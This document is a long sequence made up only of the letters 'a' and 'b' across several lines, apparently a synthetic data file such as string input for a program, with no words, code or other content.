abbbaaaaaaaaaabaabbaaaabbbbaaabaaaaaaabbaaaabaababbbaabaabbabbabaaababbbaaaabbaaaaabaabbbaaabaaaababababbbaabbababbaabbaaaaaabbabababbaaaabbbbbabbbababaababbbbabbbaababbbbbababaaabbababbabbbaaabbaaaaaabaabbbaaababbbababbbbbababbaabababaaabaabbbbaabbbbaaabaaabbbaaaaaaaaabbabbaaabbabbabaaaabbbbaabaaaabaaabbabbbaabbabaaaaaabaaabbbbbabbaabababaababbaababbaabbbbbababaababbaabaababaaaaaaabababbbabaabbaabbbabbaaabaabaabababbabbbaabababbbbabbabbaaabaabbbaababbbabbbbbbabbbabbaabaaabbaaabababbaaabbbaabaababbaaaababbbbbabbabababaaaababbaaaaaabbbbaaaaaaabaabaaaaabaaabbbbaabbbaabaabbbbaabaabbaaaababababaabbbbaabbbaabbbbbbbabbbbabbaaaaaabaaaaaababbabaaaaaabbabaaaabababbaabaababaababbababaabbaabaababbaabbbbbbbabbbbbabbbaaabbaaabbabaaabbbababbbbababbbbaaaabbaabbbaabaaaabbbaababababbaaabbbbabbababaaabbaaabbaaabaabbaaabbaaabaaabaabaaaaabbbbbbabbbbbbaaabbbabababbaaabbabbabbbaababbbbabaaaaababbbabbabaabbaabaaaaaababbbaaaaabbbaabbbbaaaabababaaabbabbbbbbabbbaabbbbbabbabbbabbabbabababbbaaababbbbaaabaaaaabbbbbbbbbbbbbaabbbbaaaaaaabbabbaaabababababbbbababbaaaaababbabababbbaaabbabaabbabaababbababbbabbbbbabbaabbbabbbbbaabaaabaabbbbbbaaabaaabbbaaaabbbbbbbbbabaaabbabbaaaaabbabbaababaaabbaaabbabbaaaaabbbaaababbababbbaaaaabbbabbbabbaabbabbbaababbbaaababbbaaabbaababbaaabbaaaaabaabaabbbaaabbabababbaaabaabbabbbbbbaaababaabbbbbabababbbabbabaabbaababaabbbbaabaaaababbbabbbbbaabbabbabbabbbbaabbabaaaaaaaaaaabbbbabaaaaaaabbabaabbbababaaaababbaababbbbabaaaababbbabbbbbbbbaaabbbbaaaabbaaabbbaaababaabbabbaaababaaabaabbbabbbaabaabaabaababaaabaaabbbaabaaabbbbbbbbababaaaaaabaabbbbbbabaabbabaabbabbbbbaababababbbababaabaabaababaaabababaabbaabaabbbaaaaaaababbbbbabaaabbbbbbbbaaabaaabbbbbaaabbaabbaabaabbababbabbaababababbabbbbaaabbabababaababaaaaaabababbabbaababbbbbabaaaababaababbabaaabbbbabbbbabbbbaaaabaaababaaabaabbbaaabbaaabbbbbaabaabaababbbbbbbbbabaaababbaabbbaabaaaaaabbaaaabaaaaabaabaaabbbbaabaaabbaaaaaaabbbbbbbababbaaabbababababababbababaaabbbabbaaabbaaababbaaabaaaabbabbbabaaaabbaaabbbaabbbababbaaababaabaabababaaaaaaaaaaaaabaaababbbbbbbabbbaabbbbbbaabbbbaababbbbbabbaabbbaaaabaabaabbababbaaabbbbbaabbbbbbaaaabbaaabaaabbbaaabbbbbbbbabbaababbaababaaabaaababbbbababbbaaabbbbbbabbabbbbaaaaababbaabaaaaaaabbbbababaabbabbabbabaaabbbbabbbbbbabbbbbbabbabaabaaabbbbbaabbaabbbaabaaababbabbababbbababbabbbbabbabbbbbabaaabaababaababbbaaabaabbaaababababaababbbabbabbbabbabbabaaabaabaababbabbbbbaabaaabaabbbbbbaabbbabbbabbbaaabbabbbaaabbbabbbaaaaababbbbababbbbaaaaaaabbbbbbaabbababbbaabbbbbaabbabbaabaaaaaaaababaaabbaaaababbababaaabbbaaaabbbaaabbabbaabababbbaabbababbabbbbababbaaabbaabbaababbbabaabbabaabaababbbaabaabbaaabaabbaabbbaaaabaabbaabbaabbbbbbbaaaaaabaabbaaaababbbaaabaaaaaabbbbbbaaaaaaaaabaabaabbbababaaaaaaaabbabaaabbaaabbabbbbbaabbabaabaabababbbbbaabaaaaabbabbaababbbabbbabbababbbaaabbbbabaaaabbbabbbbaababaaabaaabbabaaabbaaaabababbbabaabbbbabbaaaabbaaababbaabbbaababababbbbaabbbababaabbbbbabbbabababbbaabaabaaababaabbaaaaabbabbaaaaabaaababaabaaaaaabbbababbbbbbaabababbbbaaaababaababababbaaaaaaaabbbabaaaabaabaaaaaaaaaaaabbbaabaaaabaababaabbabaaabaaabbabaaaabbaabbabaabbabaaaabaaabaaabaaababbbbabbabaabaaaababbaaaaababbaabbaabbaabababaaababababbaabbababbbbaabbbbabbaaabbabaabaabaabaabaaaababaaaaababbaaabaaaaabababbaaaababaaaabbaabaaaaaaabbbaabbaaaabbabbbabaababbaabbaabaabbabaabbbababbabaabbbabbaaaaaababbbbababababaaaaabbbabbbabbaaabbbaaababbbabbaaabbaaaaaababaababbabbbaaabaaaaabaaababbbaaaabbaababbabbaaababbababaaaabbbbabbabaaabaababbbbbbbbbaabbaaabbbabbaaabbbbabbabbabaaabaabbbbbbaaabaaabbbbbabaaabbbbaabbababbaabbbaaabaaaabbbaabaaabbbabbbbbbbbbabbbaaaabbbaabbb
aaabababaabaaabbbaaabababbbabbbbabbbabbababbbaabaaaabbababbbbbabbbababaaabbaaabaabbbaabaabaaaabaaabbbabaaabababaaabbbbabbabbbabaababaaaabaaabbabbaabaabaabaabbbbbbbbbaaabaaaaababbabbbaabaaaaabbbbbabbbaaaaabbbbabaabababbabaababaabbabaaabbbbbbbbbbbabaaabaaabbbbaaababbabbaabbaabbaaabaababbabaaabbaaaaaaabbaaaaababbbbbabbbbbaabababbbaabbbaabbaaaabbabbbaaaabaaababaaaaabbbaaababaabbbabbbbabaaababbbabaaaababbbbabbaaaabbbaabbbaaabbabbabbaabbbaabbbaaaabaababbabbbbbbabaaababbbbbbbaaabbbbbbaaabaabbabaabaabaaaabbbaababababbaaaaabbbbaaabbbaaaababababbaabaaabbaaaabbbbbbbabbaaaaaababbbbbbabbaaabbbabababbaaaaababbabbbbabbbabbaabbbbabbbaaaabbaaaabbbaababbbbbabbbbbaababaabaaaabbbbbbaabaabbbabbabaaaaaabaabaaaabbbbababaabababbaabbaabbabbaaaaaaaaabbbaaababababababaaaaaaaaabbaaabbbabbabaababbaaabbbabbbbaabababababbbabbabbbabbaabbababaababbaaaaabaabbbaaabbaabbbbbbbabaaabbbaabaabbbbabbabbaaaaabbbabbaaabbbaabbaababbaaabbaabbbaaaaaabaabbabbbaabababababbbbabaabaaababbaaababaabbbaabaaabbbbabbaabbabbabbbaaaaabbaaabbaababbababbabbbabbbabbbbabbabbbabbabababbbbabaababaaabbabababbabababbaabaabbbababababababbbbbbaababbaabbaaababbbbbaaababbaabbabbabbababbaaaaaabbbbbabaabbbaaabbaabbaaabbbaababbabaabababbabbbaababaaaaababaaabababaaabaaabaabbaaaabaabbaaabbbaabbaaaaaaabaabbbbababaaabbabababbababbbbabbabababaabbabbaabbabaaabbaabbabbbaaaaaaabaaaabababbaabaaabbbaabbaabbbbbbbabbbaaabbaababbabbababbbbbaabbaaabbbbbbaaababbaaaaabaababbbabbabbbbabaaaababaababaaabaaabaaaaabaababbabbbbaabbababaababbbbaabaabbabababaabbaaaaabaaabbabaabbabaabbbaabbbabaaaabbbbaaabbbababbaabbbbababbbaaaaabaaabaaaabbaaabaaaabaabaaaaabbaaabbbaababaabbababbbaaaaabbaaabaabbbaaabbaaababaabababaababbbaaabaaabbaaabbbaababbbabaabbabaabbaaababaabaaabbabaababbbbaaaaabbaabababababbabbbaaababbbbaabbaaaabbbbaaababaaabaaaaababbbbbbaaabaababbbbbbbaaaababbbaabbaabbbbbaaabaaabbaababbabbabaabaaabababbbbbaabbbabaababbbbbabbbaabbbbbbbbabaaaabbbaaaabbababbaabaabbaaaabbabbbbbbaaabaaaabababaabbbbaaabababaaaaabbbbaabbaabbaaaabaabaabbbabbabababaaaabaaabaaabbaabbbaabbbbbaabbabbbbaabbbabaabbbbabaaababaababbbabaaabaaabaabaaabbbbbbbabbabaabaabababbabbbbaababbabababbaabbbbabbbaabbbaabbbbbbaabaaaaabaaaaabaababbabbabbbbbababaabbababaabbbababaababaabaabababbaaaaaabbbaabbbbbaaaabbaababbbbabbbababaaaaaaabbbabbbbabbbaabababbbabaaabbabbabbaabaabbbabbbaababbabbaababababbaaaabbbbaababbbbabbaabbaabbbaabbbaabaaaabbaabaaabaaabbbababaaabaaaaababaaabbbbbabbbaababbbaabbaabaaaabaaabaabaababaaabababbabbbabaabbabbaaaabbababaaaabababbaaabbaabbbabbbbbbbaabbbbaaaabaabaaabbbababaaabbbaaababbaababaabbabbbbaaababaababababaaaaaabbbbbaabaabababaaaababaaaaaabbababaaaabbabbabbaaaaaabbabbaabbbabaabaaabaaaaaabaaabaaabbaaaaaaaabababaaaaaabbabaabbbbbbabaabbbbbbbabaaaaaaaaaaabbaaaaaabbbbbaaaabaabbabbbbbaaabbbabbbaaabbabbbbbbbabaabbbabbaabbaabaabaabbbabbaaaaaaaabbbbbbaaabaababaabbbabbbabaabbbbbabaabaaababbbabbaabbbabaaaaabaabbaabbaabbababaababbabbbbaaaabbaabbbbbbbaabababbabbbbbaaabbbbbbaaaaababbbababaabbaabaaaabaaaabbbbbabbaabbbaabbabbaabbaaaababbaabbbabbabaabaabbbaababbaaaaabbababababbabbbabaaaabaababbbbbabbbbababaabbabaabbababbaaaabbbbbaaaaabbabababbbabaaaaaaaaabaaabbbbaaabbabbaaabbbaabaaaaaaabbaaaabaaabbbababbbbaaabbabaabaababbbbaabaaabaabaaabbbaaabbbabbbbaaabbabaababbbabbbbbabaabbaabbbababbaababbaaaabbabbaabababbbababbbaababbbbbaaaababbabbabaaababbbbbabaaabbbbbbaaaabaabababababbababbbababbabbaaaabbbaaaaaaabababbbabbbbabbaabbbbbbbbbbababbbbaaaababaaaabbabbaaabaabbabababbaaaabbbbbabbaabbbbabaabbaabaabaaababbaabaaaaabbaababaabaaababbbbbaaaabbbaaaabbbabaabbbaaabbabbabbaabbaabababbbabbbabaaaabaabaababaabaabbbbabbaaaabbaaaabab
aabbbabbaaabababaabaabbabbabbbbaaabaaababbabbaabbaaaaaaaaabaababbabbbbbaaaaabbbaababaaabaaabbaabbabaaabbbaababbbbabaaabbaabbbbbbbbbbaabbbabbbbababaabaaabaabbbababababaaaaaabaaaaaabbbabaaabbabaabbababaabaababbbaaabaababbbabbbbbaaababbaaabbbaabaababaabaaabbbabaaaaaababbbaaabbbaababaababbbaabbabbbaabbabbababbbababbaaababaaabbbaabaaabaabbbabbbbbbbbabaaaababaaabaaaabbbaaabbabbbabbabbabbabaaaaababbbabbaaababaaaaaaabbbbbbaaabbaabbaabbbbabbabaaabbbabaabbbabaaaaabababaabaabaaaabaaaaaaabbaabaaaaaabbbbabababbbbbbbbbaabbabaabbbbaaababbababbbaaaabbbbbbbaababbaabaabababaaaabbbabbbabbaaaaabababaabbbbaababbbaabbbbaabaaaaabbbbaabbaababababaaabababaaabbaabbbbbaaaaaaabbbaabababaaaaababaabbbaabbbaaabbaaaaaaaabababaababbabbbbabbabbbaaaabbbaaabbbbabbaaabaabaabababaabaabbaaaaaaaabbbaabbabbbaaaabbbabbbabbbbaabbbaabaaabaaababababaaaaaaaabbbbabbababbbaaabbbabbababaabbaabbbbaababbbaabbaabaabaababbbabbbbbabbabaaabaaababababababaaabbabbababaaabaabbabababaaaaabbbbbbababbbbbaaaababbabaaabaaaaabbbbabbaabaabbbaabaabbababbabbaaaaabbbbbaababbabababaaaaababaabaabababbaabababbbbbabbbaaaabbaabbbaababaabbbaabbbaababbabaaaabbbaaaabbbabbabbabbbaabbaababbbbabbaabbaabbaaabaabaababbaabbaaaabbbababbbaabaabababbbbaababaaaaaaabbbaaaabbababbaaaabaaaababaabbaabaaaabaabbababbbabaabbabbaabaaabbabaaaaabaabbbaaaaabbbabbbbaabbaaabbabaaaabaaaabbababbababbaaaaabbabbbaaababaaabbababaabaabbbaaaaabaababbaabbbaaababaabbabaababbbabaaaabababbaaabbbaaaaabbaaaaabaabaaaabaaaaabbabbbbbaabbaaaabaabbaaaabaaaaabbaababaaabaababaabababbaaababbbbbaabbaabababbabbaaaaababaabbabbbaaaabbbbbaabbaaababbbaaaabaababaaaabaaaabaaaabbbabaaaaabbbbaabaabaaababbbaabaabaaabbbbabbabaababbbbaaabababbabaaabbaabbbbaabaabbbbbbbbaaaabbbbbabaaaaaabbbaabaababababaaaabbbabbbabaaaabbbbaabbbbaabbbbbbaaaababaaaabbaaaaabaabbbaabaaaaaaabaabaaaabbabababbbbbabbaaaaabaabbbbabbbaaabbabbaabaaabaaaababbaaabababbabbaabbaaababbabbbbbabbabbaaababaaaaabaaaaaabaaaaabaabbbbbabaaaaabababbaabbabbbaaaabaababbaaaaababbbbbababaababbbaaaaababbbbbbababbbaabaaaaabbbaabbbababababbbbaababababababaabababbbbbabbabaabbbabaababbbbbaaabbababbaaaababaaabaaaaaabaabbaabbaabababbbbaabbaaabbaaaabbabbbabbbaaabababbaaaaaaaababbbbbaababbabaaabaababaaabbaabababbbbbbbbbabbabaabbbabaabaabbababaaababaababbabababbbbbbabbabbaaabaabbbabbbbaabbbbbaabaaaabbaabbabbbaaaabbbbaababaabbaabaaabbaaabababbaaabbbbaabbbbaaabaaaaaaababbabbbaaaaaabbabaabbabbbbbaaaaaaabaabaabbaaababaabbabbabbbbbababbaaabaaabaaaaaabbbaaabbabbbbbaaabbbbabbabaaaabbbaaabbaaaabbabaababababbbbbaaaabababbbbababbbabbaaabaaaaabbaabaabaababbaabaaabaaababbbbbaaaabbabaabbabbbaababaabaababaabaabbbbbaaaaaaaabaabbababbabbbbabbababaaababbbbbabbbabbaabbbabaaaaabbaababbabbbbabaaaaaabbaaababaaababbaabbaaabaabbbabbabaaaabbbaaaababbaabbabaaabaaaabaaabbbaaaabbabbbbaabbaaaabbbbaaabbababaabbaabbababbbabbbbbbbbbaaababbbabbabaabbbabaabbbaaaabaaaabbabaabbbaabbbbbababaababbbbabbaabbbbbbaabaabbbabbaaabbbaaabbbaaaaaabbaabbabaaabbaaaabaaaababbbbaabaaaaaabbabaaababaaabbaabaababbabaaaabaabababbaababaaaabaaababbbbbbabbaaabaaabababbbaabbaaaabababbbbbaabbaabbbbbabbabbaaabaaaabbaabbbabbbbaabbbaababbabbbaaabaabaabbaaaaaaaaaaaaaaaabaaabaaaabbaaaabababaabbabbabbaaaaabbbbaabbabbbaabbaabbbaaabbbabbaaabaaabbbbabababbabbbaabababababaabbbbbbbaaaabbaaabbaaaaabbabbabbaaabababbabbabababbbaaabaaabaaababbbbabbbaaaababbaaabbaaaaaabbabbaabbbbaaaaaabbababbbbbaabbbabbabbaabaaaaabaabbbbaaabbaaaaaabbbaaababbabbbaabaaaaaabbabbbbaaaabaaaaaabbbabaaaabbabaaabaabaaabbbabbababbbbbbbaaabaaabababbbabaaabbabbbbaabaabaaaaaababbaabbaabbabaaababbaabbbaababaaaabbbbbabbbaababbabaaaaaaabababaaaabbaabbabbbababaabbabbaaabbababbbbabaa
ababaababaabbbbaaaabaaabaabbaababbaaabbbbababbabbaaaaabbaabaabaabbbaabababbabaaabbaaaaaaabbabababbaababaaaabaaaabababbabaabbaaaababbabbbabaababbaaababaaaabbabaaaabababbbabbababaabaaabaaabbbabbbbabbbaabbbbabaaabaabbaaababaaabbaabaaabbabbbababbbaaaabbbaaabbbababbbaaabbabbbaababbaaaaaaabbbbaaababbbbbabaabaaababbaababaaaaabaaabbbbbaaabbbaabbbbaaabaabbabbbbbbbabbbbbababaabaaabaaaaabaabaabbabbbabbaaaabaaabbaaaabaababababbbaabbbaaabaababaaababaaaaaabbbabbbbaaaaaababbabaabbaabbabbabaaabaabbaaaaaaaababbaabbaabbabbbbbbbbabbabaabbbbbaaaabbaaaabaaabbbabaaaabbbaabaabbbaaababbbaaaaaabbbaaaababaaababbbbaabaabaabaaababbabaabbbaaababaaabaababbaababaababbbbbbbabbbaaaabaabbbabaaaababbaababbbaaababbabababbbabbbbaaabaaaabababbbbaabbbbaaabbbaaabbbabaaabaabbabababbabbababbabbaabbbbbaaabbabbbaaababbbbaabbbbbbbbbbaabbabbaaaabbabbabaababaaaabaabbbbaabbbbbaababbaaabbbbbbaaaabbaaaaababbbbaabbabbbbaabbbabbababbbabbbbabbbbbaaaaabbbbababbaaababbababbaaaaababbaabbabbbbabaaaaabbbbbbbaaababaaaabaabbaabababaabbabbbaaaaaababbbabbaabbabbaababbbbbaabbaaabbbbbababbabaaababbabbbababaaaababababbbbbbabbabaaabbbabbabaabbabbbbabaaaabaabbababbabbabbbbaaaabbbabbabbbabbabbaabbbbbabbaaaabbabbaaaaabbabaabaaabaabaabaabbabaabaaaaaabaaabbbabaabbabbbabbaabaabaaaabaabababbbbbbaaaaaabaabaaabbabbbbbababbabbababaabbaaaaaabababbaaaaabaabababbbbbabbbbaabbabababaababaaabbbabababbaaabaaaaaaaaabbaaabbabbbaaaaabbaaabbababbbbaaabaaabbbabbaabaaabbbaabbababbaabaaabbabbbabbaabbbaabaaabbbbabbbbababbbbbbaababaabaaaaabbabbbabaaaabababbabbaababaaabababbababababaaabaabaabaababbbabbaaaababbaabaaabbbbbbabbababababbbbaaabbabaabaaaaababbabbaaabaaabababbaabbbabaababaaabaaababaaababaaaaabbbaaaabbababaaaabbabbaabbbbabbbaaaabbbbbabaaaabbbaabaabbbbbbbbbbabbaaabaabaabbbabaaababaabbbaabbaabbaabbbbbabbaababaababbaaabaaaaaabbbbabbbbbbabbabbaabababababbaaabaabbaaaaaabababbbabbaaaaaabbabbaaaaaababbbbabaabaababbbbababbaabaaabbaaabababaababaabbaabbabbbabbababbabbbbababababbabaaaabaaaabbaaabbbbbababaababbaabaaaabaabaaaababbabbabaaaaaabbbaababbaaabbbbbabbbbbbbabababbabbbaaaabbaaaaaabbbbaaaaabbabbbbbaaaaaabaabbbbbababaaabbaaabbaaabbbbabbbaababaababaaabababbbababaaabbbabaaaaabaabbaaaaaabbaaaaabbabaabbbbbbaaabbbbbbbaababbaabbbbaabaaabbbbbbbbaabbaabababaabbaaaaabaabaabbbabbbbbbbaabaabbaaabbabbababbaaaabbabbbbbabaaaabaaaabaababbbababaaabaabaababaabaaababbbbbaaaaaaaabbababbbabbabaaabaabbbbabaaaaababbaaabaabbababababaabaaaabaababbaabababbbbbaababaaaabbababbbabaaabbbababbbaaabbbbabbaabaabbabbbbbababbbbbbabaabbaabababbbabbabaabbaaaabaaabbbbabaaababbbbbbabaaaabbabbabaaaaababaabaabbbbbabaabbbabaaaaabbbbababaabaabbaaabaabbbabbbbaaabbaabaaaababbbbaabbbaabbaabbabbbabbabbababbabaaabaaaabbaabababbbaabbaaabababaabbaabaaaabbabbabbababaabaabbaaaabbabababbbbaaaaabbaaabaaaaaaaabaaabbbbbaaabbaaababaaabbabaaaabbbaabbbbbaaaabbabbaaabbaaabbabbbabbabaaabbabbaaaaaaabbabbbbbabbbbaabaababaababbaaaabababbaaaaabbaaaababaabaababbabbabbabaaabbaabaaaabbbbabbbbbababababaaabababbabbaabbaabbbabbbbbaaabbababbbbaaaaabbaaaaaaabbbaaaaaaabbbbabaaabbaabaabbbabbbaabbaabbabaaabaaaabbabaabababaaaabaabababbababaabababaabbaaabbbbbaabaabbaabbbababbaababbbabbabbabbbaaaabbbaabaaabbbaaaabbabaababbbbaabbbbaabaabbaaaaaaaabaabaababbaaaaabaababaabaabbbbabaaaaaababaaaabbaaabbaaababbabaaaabababbbbbbbababbbbbbbaaabbbbbbbbbabbaaaaaaaaabaabbbbbbabbaaabbabbabababbbabbabaaabbaabbabbbaabaababaabbababbabbaabaaaabaaababbaaabbbaaabbbbabbbbbaababbababbbaababbbabbbbbbabbbbabaabaaababbaabbaaabbbbbaabaaabaaaaaaabaaaaaaaabbaabbbaaabbbbbaabbabaaababbbababbaabbababbababbbaaaababaaaaabaabbaaaaabbbbaaabbaabaababbaabbbabbbabababaababaaaababbbbbbabaaaaaaba
baabbbabbbbaaabbabbaabababbabbaabaaaaaaabaaaabbabbabbbbbbbaaabbaaabbbbbaabaaaabbabbbaaabbababaabbabbabaaabaaaabaaabbbabababbaaabbbbabababbbaaabaabaaaaaabaaabbbbbbbaaaaabbbaabababbbaaababbabbbbabbabbbaababbbbabbbaabbabaabbbababaaabbaaaaaaabbababbabbbababaaabbaaabbbaabbabaabbabbbaaababbabaaaaaaaabaaabbbbabaabaabbbbaaaabbbaabbabbbabbbbabaabbbaaabbaabbaaababbbbbbaababbabbaaabbbbabbaabbbbbbaabbbabbbbbbabbbabbababbabababbbbaabbbabaaabbabbaaaabaabbbaaabbabbbaaaabaabababbabbbaaabbbaabbaaababbbbaaabbbbbbabbbabaabbababababbbbbabbababbbbaabbaaabaabbbbaababbababaabbbbbaabaaabbbaaabbbaaaaabbbabbabaaabaabaaaaaababbbbabbabbaaababbbabaabbabbaaaababaabaabaaaabaababbabbaaaaabaaaaaababababbbbaaaaaababaaabbbababbbaaaaaaababbaababbabbabaabbaabbbabaabbaaabaabaaabbbabaabbbbabbbaaababbaabbbbbabbbaabababbbbaababababaabbaabbbabbaababaaabababaaaabbbbaabbabaaaaabaaaabaabababaaabbbbabaabaaaaaaaabbbaaaaabbaaaabbabababaabaaabbbbaabbababaabbaaaaaaaaababbbbbaabbaaabaabbabaaabaabbbbbaaaabbaabaabaaabaabbbaaababbbaabbbabbabbbaaabbabbaabbabbaabbaaabbbabaababbaaaabbbabababbaabbabaabaaabaabbbababbabaaaaaabaabbaabbabbbabbaaaaaabbaaaabbababbababbbbbabbabbaaaabaababababaababbbbbaaaabababbaabbaaaabbaabbbaaaaaaaabaaaabbababaabbaabababaaaaababaabbaaabababbabaaaaaababbbbababbabaaababaabbbbbaabbbbbbbaaaaaababbaabbbabaabbabbaabaaaabaaabaabbabbbbbbbabaaaaabaaabaaababaaaabaababaaaaababbbbabbabbbbbaabbbabababaabababbababaabaababbabbaabbaabaabbbbbbbababbaabaabaababbaababbababbaabbaabaaaabbbaabbbaabaaaabaabbbabaabbbabaaabaababbaaaaabaaaaaaaaabbbbbbaabbbaaabaabaaabbbbaabbbabbabbbbbabbbaaaaaabbbbbabaabaababbabaabaabbaaabbaababbabaababababbbaaaabaabbaabbabbbababaaabaabbbaaaababaaabbbabbbbaabbbaaaaaaabbbabaabaaabbabbabaababababbbaabbbbababaaaaabbbaaabbbbababbabbbbbbbaaabbbabaaabbababbbbaaaabbbaaaababbbbaababbbaababbabaabbababbbabbabbbaaaabbbabbaabbbabaabbababbabbbbbaabbbaaaababaaaaabaaaaabbbabbaaababbbabbbbbbbabababaaabbaaabbaabbaaaabbbbbbbbabababaabbabbbaabbabaaabbbaaaaaababbbbbbabbbabaaabbbaaabababbbaabaababaabaaaaabaaaaabbbbbbabababbabbaaaaaaaabababaaaabaabaaabaabbbaabababbaaaababbaabbabaaaaaabaaabbababaaaaababbbbbbababbaabbbaabababbbabbbbbbaaabbbbabbaabbbabbaabbbaabaabbbaababbbbbbaabbaaaaaababbaaabbabbbbbbbabbbababbaaaababaaabbbaaaababbaababbbbabbbbbbaaaabbabbbbbaaaaababbbabbbababaabaaabaaabbbbababaaaabaaababbbaaabaaaabbaabbabbaaabaaabbbabaabaaabbaaaabbaabbbbabaaaabaabbababababaabaaaaaaaabaababbabaaaaabaaaabbbbbabababbabbbaabbabbabbabbbbbbaaabbbbabbbaabaabababbbbbaaaabaababbaaaabaababaabababbaabbaaaaaaaabbaaaabaabaaaabbbbaabaaabbabbbbabbaaaabaababbbbbbbbbaaaabbabbbbbaabbbababaaaaabababaabbbaabbabaaabbaabababaabaaaaabbbaabbbbbbbabaaaaababbbbbbabbabbbabaababaababbbbabaabbbbbbabaabaababbabbbaabbbababaaabbbbababbababbbbbbabaaaabaaaaaaabbabbaaabaaabaabbabbabaaaaabaabbbaabbabaabbbbabaababbbbbbaabaaaababaaabbabaaabbbbaabbaaaaabaaabbabababbaaabaaabbbaabbabbbaaaaaaabaabaaababababaabbaabaaabbaaabaabaabbabbabaaabaabbbaabaabbababababaaaaaaabbaaabbababbbbbbbbbbbbbbbaabbbaabbbbaaaabbaabaabbbaaabbbaaaaaaabaabbbabbabbabbabbabaabbaababbaaababbabbbaabaaabbaaaaababbbabbbaabbabaaabbbabaaabababbbaaabbaabbbaaabbaababbbbbaababaaabbabbbbbabbaababbababaabaaaabbbbaabbababbbaabbbbbbbaaabaababbabbabaaabbbbaaababbabaabbbaaaababbbbbabbbaabbabaababaaaaabbabbababaababbabbbbabbabaaaaaaabbbababbbbaaabbabbaabaaaabbabbbbbaabbaabaaabaabbbbabaabbbbaababbbabbaaaaabbabaabaababbaabaabbabaabaabaabaaabaaabbbbbabbabaabbabbbbbbabaabbbabbbbabbaaaaaaabbbabbbbaaabaaabaababaaabbaabbbbabbbaababaabbababbabaabbaabbbabbbaaaaabbbbabaabbabababbabaaaababbbbababababbabbbbababbaabaaababababaaaaaaabb
abbbaababbbbaabbaaaaabaaababbbbbaaababababaaabbaabaababababbbaabbbaababababaabbbbaabbaabaabaabaaabbabbabaaabbabaaabbbaabababbabbbaabbbaaaaaabaabbbabbaabababaaabaaaaabababbaababbaabbaabaababababababbaabaaaabbbaaabbbbbaabbabaaabbbaababaaabbbababababbbaabbaaabaaaabbbabbabaaaaaaaaaaabbabbbbbaabaababaabaaabbbabbabbaaabbbbababaabaaabaababbaaaaabbabbbbabaaabbabbaabbabaaabbbbabbbaababaaaaababbbaabaabaabbbbbbaaaabbbbbbaababbbbbabbbbababbbabaaabaaabaaabababaaabaaabbbababaabaaaabaaaaaababbbbbaabbababbbbbabaabbbaaaaaabababababaaabbaaaabaabbbabbbbababbbabbaababaaaabbaaabbbaaaabaaabababaaaaaabbbbabbaabbbbbbbbbababbbbabaabbbbaaababbbabaababbababbbbabbbabaabbbaababbbaabababbbabbbababaaaabbbaaabaabbbabaabbbabbbaabbaaaaababbbabbabaaabbbbbbbabaabbbaababaabbaaabbababbbbabaaabbbaabbaabababbaaabababbaaaababbbbbaabaaaabaaaabaababaaaababaaaabaabaabbbbbbaabbbbaabaaabaabbabbabbbbabbbabababaabbabbabbbaaabaaaabbbbaaaababaababaabbbbabbaabaabbbbaaaabbabbabbabaaabbaaaabbbaaababbbbabbbabbbbbbaaaaabababbbbbaababbbabbabaabbaaabaabaabbaaaaabaaaabbaaababbbaababbbbabaabbaaababababbababbaabbbbbabbbaaaabababababbaabaaaaaaaabbbabaabbbaabbaabbbbaaaaabbbbaaaaaababababbbaaabbaabbbabbbabbbbaabababbbbabbbaabaababbbaabaaabaaaaababaaabbaaaabaabbaaabbbbbaaaaaaabbabaaaaabbabbaababaabbbaaabaabaaaaabbbbababbaaabbbabaabbbbaaabaabaaabbbbabaababaaabababbabbaaababaabbaababababaaaaaaaababaababababbaabaabaabbaabbbabaababaabbabababbbaaaabaaaaaaabababbababbbbbbaababaaaabbaababaaabaababbaabbaabbbbaababbbbbaaabaabaabbbabaaaabbabbbbbaabbaabababbbbbbbaabbaabbaaabbbbaabbaababbbaaabbaabbababaaabbbaababbbaabaabbbaabbbbaabbbabaabbbabbababaaababbaabbaaaaaaaabbaabaaababaabbaabababaaaabbabaaaabbbababbbbbabbabbababaaabaabbaaaaaaaaaababaaabbbbbaabaaaaaabbaababbbbbaababbbbaaaaabababababbbaaaabaaaaababbbababbabaababaababaabbaaaaaaaaaabbbbbbbaabaaabbbbbbabaaabbbaababbbbaabbabbaabaaaabbbaaabaaabbabbaabbabaababbbbababbbababbababababbaabbbbbbbbbbaaababbabababababaabbbaabbaabbaaabaaaaabbbbaabababbaabbbaabbbbbabbaaaabbbaabaabaaabaababbbbaaabbbbaabbaaaaaaaaababbbaabaabbbbabbabaaaaabaabbabbbabbbaababaabaabaaaaababbaaaaaaaabbbbabababaabbaabaabbaaaabbbaaaaabbaabababaababaaabababbababababbbbabbbbabbbaaabbababaaaabaabababbbbbbbaababbabbbbababbaabbabbbbbbbababaaaaaabbaaabbaabbbbaabbbabaaaaabaabaaabbaaaaabaaaaabbbbaabaaaaabbbabaaaabababbabaabaabbbabbabbbbaababbbbbbaaababaabaabbabaaabbbbaabbaaaaaabbbbbaabababaaabaababbbbaababababaabbaaababaaaaaaabbbabbbabaaabbaaaabaaaabbbbababbaabababbbabbbaaabbbabbbbabbabaabbbaaabbababaabaababbaaabbbaabaaabababaaabababababbababbabbabbbbbabbbbbaaabbbbabbbbbbbbbbbaababaababbaabbbabbaabbaaaaabababaaabaaaaabbbbbaaababbbaabbabaaaabbaabbabbbabababaaabbaabaaaabaabaaaaaabbaabbbbbaaaaaabbbbabbaaabbbabaabbbbbababbbaaaabbbaaaaaaabbaababbababbbbabaabaaabaabbabbabbaabbbabbaabbabbbabbbbbaaabaaababbababababbababbbbbbaaaaaabbaaaaabbabaabbbaaaaaaababaabababbaabaabbaaaabbbaabaaaabaaabaaaaababbbbabaaabbabaaabababababbbbbbaabaabaaabbbbbabbbabaababbabbabbbbbabababaababbbaaababbbababbabbbaaababaabababaabaaaabaaaaabbbbaaaabbbabaabbbbaabbaaabaaabbbabbaaaaabaaabbaaaabbbbbaabbaabbabbaaabaabbbbaabbbbaabbbbabaababaabbbababbaabbabbabaabbbaabbbaaaabbbabaaabbababaaabbbabbbbabbbaaaababbaabababbaaaabbabbbbbabbbabaaabbaaaaaabbabbbbbaaaaaaabbababbbaabaaaabbaaabbbabbbaababbabbabbaababaabbbbabbabaaabbbabaabbaaabaaaabbbbbbbaabbabbabaaabbbbaabbbaabababaabaaabbabaaabbbbbababbaabbaabbbbbabaabbabbabaaabbabbabaaaabaaaaababaabbaabbaaababbbbabbaabbaaaaababaaaaabaaabbaabababbabaaaaabbaababababbaaaabbbaabaaabaaabbaaabbbbbabababbbbaababbbaaabbaabbabbaaaabbaababaababbbabbbbabaababaabbabababa
